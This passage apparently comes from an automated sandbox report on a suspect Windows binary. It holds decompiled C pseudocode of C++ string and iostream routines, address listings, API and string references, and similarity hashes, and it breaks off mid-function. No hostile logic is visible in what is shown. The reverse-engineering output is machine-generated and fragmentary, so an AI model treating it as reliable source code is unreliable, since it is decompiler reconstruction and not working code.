																																_t340 =  *(_t338 + 0x10) & _t186;
																																__eflags = _t340;
																																if(_t340 == 0) {
																																	return _t186;
																																} else {
																																	__eflags = _v120;
																																	if(_v120 != 0) {
																																		E00416C8D(0, 0);
																																		goto L185;
																																	} else {
																																		__eflags = _t340 & 0x00000004;
																																		if((_t340 & 0x00000004) != 0) {
																																			L185:
																																			_t188 = E00402600(_t412);
																																			_push("ios_base::badbit set");
																																			_push(_t188);
																																			E00404A40(_t304,  &_v148, _t373, _t448, 1);
																																			_v160 = 0x4377b4;
																																			E00416C8D( &_v160, 0x447bb0);
																																			goto L186;
																																		} else {
																																			__eflags = _t340 & 0x00000002;
																																			if((_t340 & 0x00000002) != 0) {
																																				L186:
																																				_t192 = E00402600(_t412);
																																				_push("ios_base::failbit set");
																																				_push(_t192);
																																				E00404A40(_t304,  &_v156, _t373, _t448, 1);
																																				_v168 = 0x4377b4;
																																				E00416C8D( &_v168, 0x447bb0);
																																			} else {
																																			}
																																		}
																																	}
																																	_t196 = E00402600(_t412);
																																	_push("ios_base::eofbit set");
																																	_push(_t196);
																																	_t343 =  &_v164;
																																	E00404A40(_t304, _t343, _t373, _t448, 1);
																																	_v176 = 0x4377b4;
																																	E00416C8D( &_v176, 0x447bb0);
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	_push(_t412);
																																	_t414 = _t343;
																																	_push(_t373);
																																	__eflags =  *(_t414 + 0x4c);
																																	if( *(_t414 + 0x4c) != 0) {
																																		_t200 = E00409250(_t343, _t373, _t414, _t448);
																																		_push( *(_t414 + 0x4c));
																																		__eflags = _t200;
																																		_t376 =  ==  ? 0 : _t414;
																																		__eflags = E0041B702(0, _t200);
																																		_t377 =  !=  ? 0 :  ==  ? 0 : _t414;
																																	} else {
																																		_t377 = 0;
																																	}
																																	 *((char*)(_t414 + 0x48)) = 0;
																																	 *(_t414 + 0xc) = _t414 + 4;
																																	_t346 = _t414 + 8;
																																	 *(_t414 + 0x10) = _t346;
																																	 *(_t414 + 0x1c) = _t414 + 0x14;
																																	 *(_t414 + 0x20) = _t414 + 0x18;
																																	 *(_t414 + 0x2c) = _t414 + 0x24;
																																	 *(_t414 + 0x30) = _t414 + 0x28;
																																	 *((char*)(_t414 + 0x3d)) = 0;
																																	 *_t346 = 0;
																																	 *( *(_t414 + 0x20)) = 0;
																																	 *( *(_t414 + 0x30)) = 0;
																																	 *( *(_t414 + 0xc)) = 0;
																																	 *( *(_t414 + 0x1c)) = 0;
																																	 *( *(_t414 + 0x2c)) = 0;
																																	 *(_t414 + 0x4c) = 0;
																																	_t349 =  *0x44c7ec; // 0x0
																																	 *((intOrPtr*)(_t414 + 0x40)) = _t349;
																																	_t350 =  *0x44c7f0; // 0x0
																																	 *((intOrPtr*)(_t414 + 0x44)) = _t350;
																																	 *(_t414 + 0x38) = 0;
																																	return _t377;
																																}
																															} else {
																																_t211 =  *(_t338 - 4);
																																__eflags = _t211 - _t338;
																																if(__eflags >= 0) {
																																	goto L177;
																																} else {
																																	_t338 = _t338 - _t211;
																																	__eflags = _t338 - 4;
																																	if(__eflags < 0) {
																																		goto L177;
																																	} else {
																																		__eflags = _t338 - 0x23;
																																		if(__eflags > 0) {
																																			goto L177;
																																		} else {
																																			_t338 = _t211;
																																			goto L171;
																																		}
																																	}
																																}
																															}
																														}
																													}
																													goto L192;
																													L172:
																													_t412[0x14] = 0xf;
																													__eflags = _t412[0x14] - 0x10;
																													_t412[0x10] = 0;
																													if(_t412[0x14] >= 0x10) {
																														_t412 =  *_t412;
																													}
																													 *_t412 = 0;
																													_t180 = L0041503F(_t373);
																													_t464 = _t464 + 4;
																													_t373 = _t304;
																													__eflags = _t304 - _v0;
																												} while (_t304 != _v0);
																												goto L176;
																											}
																										} else {
																											__eflags =  *(_t411 + 0x14) - _t372;
																											if( *(_t411 + 0x14) >= _t372) {
																												__eflags = _t372;
																												if(_t372 != 0) {
																													goto L148;
																												} else {
																													__eflags =  *(_t411 + 0x14) - 0x10;
																													 *(_t411 + 0x10) = _t372;
																													if( *(_t411 + 0x14) < 0x10) {
																														_t218 = _t411;
																														 *_t218 = 0;
																														return _t218;
																													} else {
																														 *( *_t411) = 0;
																														return _t411;
																													}
																												}
																											} else {
																												E004077E0(_t411, _t372,  *(_t411 + 0x10));
																												__eflags = _t372;
																												if(_t372 == 0) {
																													L160:
																													return _t411;
																												} else {
																													L148:
																													__eflags =  *(_t411 + 0x14) - 0x10;
																													if( *(_t411 + 0x14) < 0x10) {
																														_t212 = _t411;
																													} else {
																														_t212 =  *_t411;
																													}
																													__eflags = _t372;
																													if(_t372 != 0) {
																														E004170E0(_t212, _t303, _t372);
																													}
																													__eflags =  *(_t411 + 0x14) - 0x10;
																													 *(_t411 + 0x10) = _t372;
																													if( *(_t411 + 0x14) < 0x10) {
																														 *((char*)(_t411 + _t372)) = 0;
																														goto L160;
																													} else {
																														 *((char*)( *_t411 + _t372)) = 0;
																														return _t411;
																													}
																												}
																											}
																										}
																									} else {
																										_t337 =  *(_t411 + 0x14);
																										__eflags = _t337 - 0x10;
																										if(_t337 < 0x10) {
																											_t222 = _t411;
																										} else {
																											_t222 =  *_t411;
																										}
																										__eflags = _t303 - _t222;
																										if(_t303 < _t222) {
																											goto L145;
																										} else {
																											__eflags = _t337 - 0x10;
																											if(_t337 < 0x10) {
																												_t369 = _t411;
																											} else {
																												_t369 =  *_t411;
																											}
																											__eflags =  *(_t411 + 0x10) + _t369 - _t303;
																											if( *(_t411 + 0x10) + _t369 <= _t303) {
																												goto L145;
																											} else {
																												__eflags = _t337 - 0x10;
																												if(_t337 < 0x10) {
																													_push(_v88);
																													_t225 = _t411;
																													_t310 = _t303 - _t225;
																													__eflags = _t310;
																													_push(_t310);
																													_push(_t411);
																													L84();
																													return _t225;
																												} else {
																													_push(_v88);
																													_t226 =  *_t411;
																													_t312 = _t303 - _t226;
																													__eflags = _t312;
																													_push(_t312);
																													_push(_t411);
																													L84();
																													return _t226;
																												}
																											}
																										}
																									}
																								} else {
																									__eflags =  *((intOrPtr*)(_t410 + 0x14)) - _t371;
																									if( *((intOrPtr*)(_t410 + 0x14)) >= _t371) {
																										__eflags = _t371;
																										if(_t371 != 0) {
																											goto L115;
																										} else {
																											__eflags =  *((intOrPtr*)(_t410 + 0x14)) - 0x10;
																											 *(_t410 + 0x10) = _t371;
																											if( *((intOrPtr*)(_t410 + 0x14)) < 0x10) {
																												_t235 = _t410;
																												 *_t235 = 0;
																												return _t235;
																											} else {
																												 *( *_t410) = 0;
																												return _t410;
																											}
																										}
																									} else {
																										E004077E0(_t337, _t371,  *(_t410 + 0x10));
																										__eflags = _t371;
																										if(_t371 == 0) {
																											L130:
																											return _t410;
																										} else {
																											L115:
																											__eflags = _t371 - 1;
																											if(_t371 != 1) {
																												__eflags =  *((intOrPtr*)(_t410 + 0x14)) - 0x10;
																												if( *((intOrPtr*)(_t410 + 0x14)) < 0x10) {
																													_t354 = _t410;
																												} else {
																													_t354 =  *_t410;
																												}
																												E00417660(_t371, _t354, _v72, _t371);
																											} else {
																												__eflags =  *((intOrPtr*)(_t410 + 0x14)) - 0x10;
																												if( *((intOrPtr*)(_t410 + 0x14)) < 0x10) {
																													 *_t410 = _v72;
																												} else {
																													 *( *_t410) = _v72;
																												}
																											}
																											__eflags =  *((intOrPtr*)(_t410 + 0x14)) - 0x10;
																											 *(_t410 + 0x10) = _t371;
																											if( *((intOrPtr*)(_t410 + 0x14)) < 0x10) {
																												 *((char*)(_t410 + _t371)) = 0;
																												goto L130;
																											} else {
																												 *((char*)( *_t410 + _t371)) = 0;
																												return _t410;
																											}
																										}
																									}
																								}
																							}
																						} else {
																							 *(_t409 + 0x10) = _t250;
																							__eflags =  *((intOrPtr*)(_t409 + 0x14)) - 0x10;
																							if( *((intOrPtr*)(_t409 + 0x14)) >= 0x10) {
																								_t337 =  *_t409;
																							}
																							 *((char*)(_t337 + _t250)) = 0;
																							E0040DFD0(_t302, _t409, _t447, 0, _t447);
																							return _t409;
																						}
																					}
																				}
																			} else {
																				__eflags =  *((intOrPtr*)(_t408 + 0x14)) - _t370;
																				if( *((intOrPtr*)(_t408 + 0x14)) >= _t370) {
																					__eflags = _t370;
																					if(_t370 != 0) {
																						goto L69;
																					} else {
																						 *(_t408 + 0x10) = _t370;
																						__eflags =  *((intOrPtr*)(_t408 + 0x14)) - 0x10;
																						if( *((intOrPtr*)(_t408 + 0x14)) < 0x10) {
																							_t260 = _t408;
																							 *_t260 = 0;
																							return _t260;
																						} else {
																							 *( *_t408) = 0;
																							return _t408;
																						}
																					}
																				} else {
																					E004077E0(_t408, _t370, _t337);
																					__eflags = _t370;
																					if(_t370 == 0) {
																						goto L81;
																					} else {
																						L69:
																						__eflags =  *((intOrPtr*)(_t408 + 0x14)) - 0x10;
																						if( *((intOrPtr*)(_t408 + 0x14)) < 0x10) {
																							_t359 = _t408;
																						} else {
																							_t359 =  *_t408;
																						}
																						__eflags = _t446;
																						if(_t446 != 0) {
																							__eflags =  *(_t408 + 0x10) + _t359;
																							E004170E0( *(_t408 + 0x10) + _t359, _t301, _t446);
																						}
																						__eflags =  *((intOrPtr*)(_t408 + 0x14)) - 0x10;
																						 *(_t408 + 0x10) = _t370;
																						if( *((intOrPtr*)(_t408 + 0x14)) < 0x10) {
																							 *((char*)(_t408 + _t370)) = 0;
																							goto L81;
																						} else {
																							 *((char*)( *_t408 + _t370)) = 0;
																							return _t408;
																						}
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t361 =  *((intOrPtr*)(_t408 + 0x14));
																	__eflags = _t361 - 0x10;
																	if(_t361 < 0x10) {
																		_t264 = _t408;
																	} else {
																		_t264 =  *_t408;
																	}
																	__eflags = _t301 - _t264;
																	if(_t301 < _t264) {
																		goto L64;
																	} else {
																		__eflags = _t361 - 0x10;
																		if(_t361 < 0x10) {
																			_t369 = _t408;
																		} else {
																			_t369 =  *_t408;
																		}
																		__eflags =  *(_t408 + 0x10) + _t369 - _t301;
																		if( *(_t408 + 0x10) + _t369 <= _t301) {
																			goto L64;
																		} else {
																			__eflags = _t361 - 0x10;
																			if(_t361 < 0x10) {
																				_push(_v28);
																				_t267 = _t408;
																				_t323 = _t301 - _t267;
																				__eflags = _t323;
																				_push(_t323);
																				_push(_t408);
																				L13();
																				return _t267;
																			} else {
																				_push(_v28);
																				_t268 =  *_t408;
																				_t325 = _t301 - _t268;
																				__eflags = _t325;
																				_push(_t325);
																				_push(_t408);
																				L13();
																				return _t268;
																			}
																		}
																	}
																}
															} else {
																__eflags =  *((intOrPtr*)(_t407 + 0x14)) - _t370;
																if( *((intOrPtr*)(_t407 + 0x14)) >= _t370) {
																	__eflags = _t370;
																	if(_t370 != 0) {
																		goto L42;
																	} else {
																		 *(_t407 + 0x10) = _t370;
																		__eflags =  *((intOrPtr*)(_t407 + 0x14)) - 0x10;
																		if( *((intOrPtr*)(_t407 + 0x14)) < 0x10) {
																			_t274 = _t407;
																			 *_t274 = 0;
																			return _t274;
																		} else {
																			 *((char*)( *_t407)) = 0;
																			return _t407;
																		}
																	}
																} else {
																	E004077E0(_t407, _t370, _t336);
																	__eflags = _t370;
																	if(_t370 == 0) {
																		goto L49;
																	} else {
																		L42:
																		E004072A0(_t407,  *(_t407 + 0x10), _t300, _v12);
																		__eflags =  *((intOrPtr*)(_t407 + 0x14)) - 0x10;
																		 *(_t407 + 0x10) = _t370;
																		if( *((intOrPtr*)(_t407 + 0x14)) < 0x10) {
																			 *((char*)(_t407 + _t370)) = 0;
																			goto L49;
																		} else {
																			 *((char*)( *_t407 + _t370)) = 0;
																			return _t407;
																		}
																	}
																}
															}
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t406 + 0x14)) - _t370;
													if( *((intOrPtr*)(_t406 + 0x14)) >= _t370) {
														__eflags = _t370;
														if(_t370 != 0) {
															goto L19;
														} else {
															 *(_t406 + 0x10) = _t370;
															__eflags =  *((intOrPtr*)(_t406 + 0x14)) - 0x10;
															if( *((intOrPtr*)(_t406 + 0x14)) < 0x10) {
																_t289 = _t406;
																 *_t289 = 0;
																return _t289;
															} else {
																 *( *_t406) = 0;
																return _t406;
															}
														}
													} else {
														E004077E0(_t406, _t370, _t335);
														_t369 = _v0;
														__eflags = _t370;
														if(_t370 == 0) {
															goto L33;
														} else {
															L19:
															__eflags =  *((intOrPtr*)(_t299 + 0x14)) - 0x10;
															if( *((intOrPtr*)(_t299 + 0x14)) >= 0x10) {
																_t299 =  *_t299;
															}
															__eflags =  *((intOrPtr*)(_t406 + 0x14)) - 0x10;
															if( *((intOrPtr*)(_t406 + 0x14)) < 0x10) {
																_t366 = _t406;
															} else {
																_t366 =  *_t406;
															}
															__eflags = _t445;
															if(_t445 != 0) {
																__eflags =  *(_t406 + 0x10) + _t366;
																E004170E0( *(_t406 + 0x10) + _t366, _t299 + _t369, _t445);
															}
															__eflags =  *((intOrPtr*)(_t406 + 0x14)) - 0x10;
															 *(_t406 + 0x10) = _t370;
															if( *((intOrPtr*)(_t406 + 0x14)) < 0x10) {
																 *((char*)(_t406 + _t370)) = 0;
																goto L33;
															} else {
																 *((char*)( *_t406 + _t370)) = 0;
																return _t406;
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t5 = _t335 + 0x23; // 0x23
									_t297 = _t5 & 0xffffffe0;
									__eflags = _t297;
									 *(_t297 - 4) = _t335;
									return _t297;
								}
							}
						}
					}
				} else {
					L1:
					return _t155;
				}
				L192:
			}

0x0040c870
0x0040c870
0x0040c870
0x0040c870
0x0040c876
0x0040c87b
0x0040c880
0x0040c8c0
0x00000000
0x0040c882
0x0040c885
0x0040c888
0x0040c88d
0x0040c8b2
0x0040c8b7
0x0040c8ba
0x0040c8bc
0x00000000
0x0040c8be
0x00000000
0x0040c8be
0x0040c88f
0x0040c88f
0x0040c892
0x0040c894
0x0040c8c5
0x0040c8c5
0x00000000
0x0040c896
0x0040c89c
0x0040c89e
0x0040c8a1
0x0040c8a3
0x0040c8ca
0x0040c8ca
0x0040c8cf
0x0040c8cf
0x0040c8d4
0x0040c8d5
0x0040c8d6
0x0040c8d7
0x0040c8d8
0x0040c8d9
0x0040c8da
0x0040c8db
0x0040c8dc
0x0040c8dd
0x0040c8de
0x0040c8df
0x0040c8e0
0x0040c8e4
0x0040c8e5
0x0040c8ea
0x0040c8ec
0x0040c8ef
0x0040c8f1
0x0040c9b6
0x0040c9bb
0x00000000
0x0040c8f7
0x0040c8f7
0x0040c8fa
0x0040c8fc
0x0040c8fd
0x0040c901
0x0040c903
0x0040c90a
0x0040c90c
0x0040c9c0
0x0040c9c0
0x0040c9c5
0x00000000
0x0040c912
0x0040c912
0x0040c913
0x0040c916
0x0040c918
0x0040c9ad
0x0040c9b3
0x0040c91e
0x0040c91e
0x0040c921
0x0040c9ca
0x0040c9ca
0x0040c9cf
0x0040c9d4
0x0040c9d5
0x0040c9d6
0x0040c9d7
0x0040c9d8
0x0040c9d9
0x0040c9da
0x0040c9db
0x0040c9dc
0x0040c9dd
0x0040c9de
0x0040c9df
0x0040c9e0
0x0040c9e1
0x0040c9e5
0x0040c9e6
0x0040c9e8
0x0040c9ef
0x0040c9f1
0x0040ca6b
0x0040ca70
0x00000000
0x0040c9f3
0x0040c9f3
0x0040c9f4
0x0040c9f7
0x0040c9f9
0x0040ca63
0x0040ca68
0x0040c9fb
0x0040c9fb
0x0040c9fe
0x0040ca75
0x0040ca75
0x0040ca7a
0x0040ca7f
0x0040ca80
0x0040ca81
0x0040ca85
0x0040ca86
0x0040ca88
0x0040ca8a
0x0040cae3
0x0040cae3
0x0040cae8
0x0040cae9
0x0040caef
0x0040caf1
0x0040cb8c
0x0040cb91
0x00000000
0x0040caf7
0x0040caf7
0x0040caf8
0x0040cafb
0x0040cafd
0x0040cb83
0x0040cb89
0x0040cb03
0x0040cb03
0x0040cb06
0x0040cb96
0x0040cb96
0x0040cb9b
0x0040cba0
0x0040cba1
0x0040cba2
0x0040cba3
0x0040cba4
0x0040cba5
0x0040cba6
0x0040cba7
0x0040cba8
0x0040cba9
0x0040cbaa
0x0040cbab
0x0040cbac
0x0040cbad
0x0040cbae
0x0040cbaf
0x0040cbb0
0x0040cbb1
0x0040cbb5
0x0040cbb6
0x0040cbba
0x0040cbbb
0x0040cbbe
0x0040cbc0
0x0040cbc2
0x0040cc95
0x0040cc9a
0x00000000
0x0040cbc8
0x0040cbc8
0x0040cbca
0x0040cbcb
0x0040cbcf
0x0040cbd1
0x0040cbd4
0x0040cbd6
0x0040cc06
0x0040cc09
0x00000000
0x0040cc0f
0x0040cc0f
0x0040cc12
0x0040cc33
0x0040cc35
0x00000000
0x0040cc37
0x0040cc37
0x0040cc3b
0x0040cc3e
0x0040cc4f
0x0040cc54
0x0040cc57
0x0040cc40
0x0040cc43
0x0040cc4b
0x0040cc4b
0x0040cc3e
0x0040cc14
0x0040cc18
0x0040cc1d
0x0040cc1f
0x0040cc8c
0x0040cc92
0x0040cc21
0x0040cc21
0x0040cc21
0x0040cc25
0x0040cc27
0x0040cc27
0x0040cc29
0x0040cc2d
0x0040cc5a
0x0040cc2f
0x0040cc2f
0x0040cc2f
0x0040cc5c
0x0040cc5e
0x0040cc66
0x0040cc6b
0x0040cc6e
0x0040cc72
0x0040cc75
0x0040cc88
0x00000000
0x0040cc77
0x0040cc79
0x0040cc83
0x0040cc83
0x0040cc75
0x0040cc1f
0x0040cc12
0x0040cbd8
0x0040cbd8
0x0040cbdb
0x0040cbde
0x0040cc9f
0x0040cc9f
0x0040cca4
0x0040cca9
0x0040cca9
0x0040ccae
0x0040ccb3
0x0040ccb4
0x0040ccb5
0x0040ccb6
0x0040ccb7
0x0040ccb8
0x0040ccb9
0x0040ccba
0x0040ccbb
0x0040ccbc
0x0040ccbd
0x0040ccbe
0x0040ccbf
0x0040ccc0
0x0040ccc1
0x0040ccc2
0x0040ccc6
0x0040ccc8
0x0040cccb
0x0040cd6d
0x0040cd72
0x00000000
0x0040ccd1
0x0040ccd1
0x0040ccd4
0x0040cd77
0x0040cd77
0x0040cd7c
0x0040cd81
0x0040cd82
0x0040cd83
0x0040cd84
0x0040cd85
0x0040cd86
0x0040cd87
0x0040cd88
0x0040cd89
0x0040cd8a
0x0040cd8b
0x0040cd8c
0x0040cd8d
0x0040cd8e
0x0040cd8f
0x0040cd90
0x0040cd91
0x0040cd95
0x0040cd96
0x0040cd98
0x0040cd9a
0x0040cdf3
0x0040cdf3
0x0040cdf4
0x0040cdf8
0x0040cdfb
0x0040ce76
0x0040ce7b
0x0040ce80
0x0040ce81
0x0040ce82
0x0040ce83
0x0040ce84
0x0040ce85
0x0040ce86
0x0040ce87
0x0040ce88
0x0040ce89
0x0040ce8a
0x0040ce8b
0x0040ce8c
0x0040ce8d
0x0040ce8e
0x0040ce8f
0x0040ce90
0x0040ce91
0x0040ce93
0x0040ce94
0x0040ce97
0x0040ce99
0x0040ce9b
0x0040ce9e
0x0040cea1
0x0040cea8
0x0040ceab
0x0040cf15
0x0040cf17
0x0040cead
0x0040cead
0x0040ceae
0x0040ceb0
0x0040ceb0
0x0040ceb0
0x0040ceb3
0x0040ceb3
0x0040ceb6
0x0040ceb8
0x0040cebb
0x00000000
0x0040cebd
0x0040cebd
0x0040cec0
0x0040cec5
0x0040cee1
0x0040cee2
0x0040cee7
0x00000000
0x0040cec7
0x0040cec7
0x0040ceca
0x0040cf18
0x0040cf18
0x0040cf1d
0x0040cf1e
0x0040cf1f
0x0040cf27
0x0040cf2a
0x0040cf30
0x0040cf30
0x0040cf32
0x0040cf4a
0x0040cf34
0x0040cf34
0x0040cf39
0x0040cf51
0x00000000
0x0040cf3b
0x0040cf3b
0x0040cf3e
0x0040cf56
0x0040cf56
0x0040cf5b
0x0040cf60
0x0040cf67
0x0040cf75
0x0040cf7e
0x00000000
0x0040cf40
0x0040cf40
0x0040cf43
0x0040cf83
0x0040cf83
0x0040cf88
0x0040cf8d
0x0040cf94
0x0040cfa2
0x0040cfab
0x00000000
0x0040cf45
0x0040cf43
0x0040cf3e
0x0040cfb0
0x0040cfb5
0x0040cfba
0x0040cfbd
0x0040cfc1
0x0040cfcf
0x0040cfd8
0x0040cfdd
0x0040cfde
0x0040cfdf
0x0040cfe0
0x0040cfe1
0x0040cfe3
0x0040cfe4
0x0040cfe8
0x0040cfee
0x0040cff3
0x0040cffa
0x0040cffc
0x0040d009
0x0040d00b
0x0040cfea
0x0040cfea
0x0040cfea
0x0040d011
0x0040d015
0x0040d018
0x0040d01e
0x0040d021
0x0040d027
0x0040d02d
0x0040d033
0x0040d036
0x0040d03a
0x0040d043
0x0040d04c
0x0040d055
0x0040d061
0x0040d06a
0x0040d070
0x0040d077
0x0040d07d
0x0040d080
0x0040d086
0x0040d089
0x0040d091
0x0040d091
0x0040cecc
0x0040cecc
0x0040cecf
0x0040ced1
0x00000000
0x0040ced3
0x0040ced3
0x0040ced5
0x0040ced8
0x00000000
0x0040ceda
0x0040ceda
0x0040cedd
0x00000000
0x0040cedf
0x0040cedf
0x00000000
0x0040cedf
0x0040cedd
0x0040ced8
0x0040ced1
0x0040ceca
0x0040cec5
0x00000000
0x0040ceea
0x0040ceea
0x0040cef1
0x0040cef5
0x0040cefc
0x0040cefe
0x0040cefe
0x0040cf01
0x0040cf04
0x0040cf09
0x0040cf0c
0x0040cf0e
0x0040cf0e
0x00000000
0x0040cf14
0x0040cdfd
0x0040cdfd
0x0040ce00
0x0040ce1b
0x0040ce1d
0x00000000
0x0040ce1f
0x0040ce1f
0x0040ce23
0x0040ce26
0x0040ce35
0x0040ce3a
0x0040ce3d
0x0040ce28
0x0040ce2b
0x0040ce32
0x0040ce32
0x0040ce26
0x0040ce02
0x0040ce08
0x0040ce0d
0x0040ce0f
0x0040ce6e
0x0040ce73
0x0040ce11
0x0040ce11
0x0040ce11
0x0040ce15
0x0040ce40
0x0040ce17
0x0040ce17
0x0040ce17
0x0040ce42
0x0040ce44
0x0040ce49
0x0040ce4e
0x0040ce51
0x0040ce55
0x0040ce58
0x0040ce6a
0x00000000
0x0040ce5a
0x0040ce5c
0x0040ce65
0x0040ce65
0x0040ce58
0x0040ce0f
0x0040ce00
0x0040cd9c
0x0040cd9c
0x0040cd9f
0x0040cda2
0x0040cda8
0x0040cda4
0x0040cda4
0x0040cda4
0x0040cdaa
0x0040cdac
0x00000000
0x0040cdae
0x0040cdae
0x0040cdb1
0x0040cdb7
0x0040cdb3
0x0040cdb3
0x0040cdb3
0x0040cdbe
0x0040cdc0
0x00000000
0x0040cdc2
0x0040cdc2
0x0040cdc5
0x0040cddd
0x0040cde1
0x0040cde5
0x0040cde5
0x0040cde7
0x0040cde8
0x0040cde9
0x0040cdf0
0x0040cdc7
0x0040cdc7
0x0040cdcb
0x0040cdcf
0x0040cdcf
0x0040cdd1
0x0040cdd2
0x0040cdd3
0x0040cdda
0x0040cdda
0x0040cdc5
0x0040cdc0
0x0040cdac
0x0040ccda
0x0040ccda
0x0040ccdd
0x0040cd01
0x0040cd03
0x00000000
0x0040cd05
0x0040cd05
0x0040cd09
0x0040cd0c
0x0040cd1a
0x0040cd1e
0x0040cd21
0x0040cd0e
0x0040cd11
0x0040cd17
0x0040cd17
0x0040cd0c
0x0040ccdf
0x0040cce3
0x0040cce8
0x0040ccea
0x0040cd66
0x0040cd6a
0x0040ccec
0x0040ccec
0x0040ccec
0x0040ccef
0x0040cd2e
0x0040cd32
0x0040cd38
0x0040cd34
0x0040cd34
0x0040cd34
0x0040cd42
0x0040ccf1
0x0040ccf1
0x0040ccf5
0x0040cd2a
0x0040ccf7
0x0040ccfd
0x0040ccfd
0x0040ccf5
0x0040cd4a
0x0040cd4e
0x0040cd51
0x0040cd62
0x00000000
0x0040cd53
0x0040cd55
0x0040cd5d
0x0040cd5d
0x0040cd51
0x0040ccea
0x0040ccdd
0x0040ccd4
0x0040cbe4
0x0040cbe4
0x0040cbe7
0x0040cbeb
0x0040cbed
0x0040cbed
0x0040cbf0
0x0040cbf8
0x0040cc03
0x0040cc03
0x0040cbde
0x0040cbd6
0x0040cb0c
0x0040cb0c
0x0040cb0f
0x0040cb28
0x0040cb2a
0x00000000
0x0040cb2c
0x0040cb2c
0x0040cb2f
0x0040cb33
0x0040cb44
0x0040cb49
0x0040cb4c
0x0040cb35
0x0040cb39
0x0040cb40
0x0040cb40
0x0040cb33
0x0040cb11
0x0040cb15
0x0040cb1a
0x0040cb1c
0x00000000
0x0040cb1e
0x0040cb1e
0x0040cb1e
0x0040cb22
0x0040cb4f
0x0040cb24
0x0040cb24
0x0040cb24
0x0040cb51
0x0040cb53
0x0040cb59
0x0040cb5d
0x0040cb62
0x0040cb65
0x0040cb69
0x0040cb6c
0x0040cb7f
0x00000000
0x0040cb6e
0x0040cb70
0x0040cb7a
0x0040cb7a
0x0040cb6c
0x0040cb1c
0x0040cb0f
0x0040cb06
0x0040cafd
0x0040ca8c
0x0040ca8c
0x0040ca8f
0x0040ca92
0x0040ca98
0x0040ca94
0x0040ca94
0x0040ca94
0x0040ca9a
0x0040ca9c
0x00000000
0x0040ca9e
0x0040ca9e
0x0040caa1
0x0040caa7
0x0040caa3
0x0040caa3
0x0040caa3
0x0040caae
0x0040cab0
0x00000000
0x0040cab2
0x0040cab2
0x0040cab5
0x0040cacd
0x0040cad1
0x0040cad5
0x0040cad5
0x0040cad7
0x0040cad8
0x0040cad9
0x0040cae0
0x0040cab7
0x0040cab7
0x0040cabb
0x0040cabf
0x0040cabf
0x0040cac1
0x0040cac2
0x0040cac3
0x0040caca
0x0040caca
0x0040cab5
0x0040cab0
0x0040ca9c
0x0040ca00
0x0040ca00
0x0040ca03
0x0040ca38
0x0040ca3a
0x00000000
0x0040ca3c
0x0040ca3c
0x0040ca3f
0x0040ca43
0x0040ca52
0x0040ca57
0x0040ca5a
0x0040ca45
0x0040ca48
0x0040ca4f
0x0040ca4f
0x0040ca43
0x0040ca05
0x0040ca09
0x0040ca0e
0x0040ca10
0x00000000
0x0040ca12
0x0040ca12
0x0040ca1c
0x0040ca21
0x0040ca25
0x0040ca28
0x0040ca5f
0x00000000
0x0040ca2a
0x0040ca2c
0x0040ca35
0x0040ca35
0x0040ca28
0x0040ca10
0x0040ca03
0x0040c9fe
0x0040c9f9
0x0040c927
0x0040c927
0x0040c92a
0x0040c94f
0x0040c951
0x00000000
0x0040c953
0x0040c953
0x0040c956
0x0040c95a
0x0040c96b
0x0040c970
0x0040c973
0x0040c95c
0x0040c960
0x0040c967
0x0040c967
0x0040c95a
0x0040c92c
0x0040c930
0x0040c935
0x0040c939
0x0040c93b
0x00000000
0x0040c93d
0x0040c93d
0x0040c93d
0x0040c941
0x0040c943
0x0040c943
0x0040c945
0x0040c949
0x0040c976
0x0040c94b
0x0040c94b
0x0040c94b
0x0040c978
0x0040c97a
0x0040c984
0x0040c987
0x0040c98c
0x0040c98f
0x0040c993
0x0040c996
0x0040c9a9
0x00000000
0x0040c998
0x0040c99a
0x0040c9a4
0x0040c9a4
0x0040c996
0x0040c93b
0x0040c92a
0x0040c921
0x0040c918
0x0040c90c
0x0040c8a5
0x0040c8a5
0x0040c8a8
0x0040c8a8
0x0040c8ab
0x0040c8ae
0x0040c8ae
0x0040c8a3
0x0040c894
0x0040c88d
0x0040c878
0x0040c878
0x0040c878
0x0040c878
0x00000000

APIs

new.LIBCMT ref: 0040C8B2

Part of subcall function 0041500C: Concurrency::cancel_current_task.LIBCPMT ref: 0041502B

new.LIBCMT ref: 0040C897
Concurrency::cancel_current_task.LIBCPMT ref: 0040C8C0

Part of subcall function 00415C7B: __CxxThrowException@8.LIBVCRUNTIME ref: 00415C92

Concurrency::cancel_current_task.LIBCPMT ref: 0040C8C5

Strings

ios_base::badbit set, xrefs: 0040CF5B
invalid string position, xrefs: 0040CC9F
ios_base::eofbit set, xrefs: 0040CFB5
string too long, xrefs: 0040C9C0, 0040C9CA, 0040CA75, 0040CB96, 0040CCA9, 0040CD77
ios_base::failbit set, xrefs: 0040CF88

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_task$Exception@8Throw
String ID: invalid string position$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$string too long
API String ID: 3339364867-3795315105
Opcode ID: 13f9da21b00f245493eeb0e4827b53de1a8f4471d635cc71df234d96e0c5a20d
Instruction ID: 7d0d251f189ca56f06226edc9f9ecf0ed6c44e52bf9cb965bcf7bbc84ddb778a
Opcode Fuzzy Hash: 13f9da21b00f245493eeb0e4827b53de1a8f4471d635cc71df234d96e0c5a20d
Instruction Fuzzy Hash: 9CF0E9B3150600C9E728B772C4D6AEF73449E9034E710833FE516D6291FB3CC89981AE

Uniqueness

Uniqueness Score: 100.00%

Function 004083F2, Relevance: 15.3, APIs: 2, Strings: 8, Instructions: 295
stringUNIQUE

Download Yara Rule

C-Code - Quality: 99%

			E004083F2(void* __edx, WCHAR* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				short _v44;
				char _v45;
				char _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				intOrPtr _v58;
				intOrPtr _v62;
				char _v63;
				char _v64;
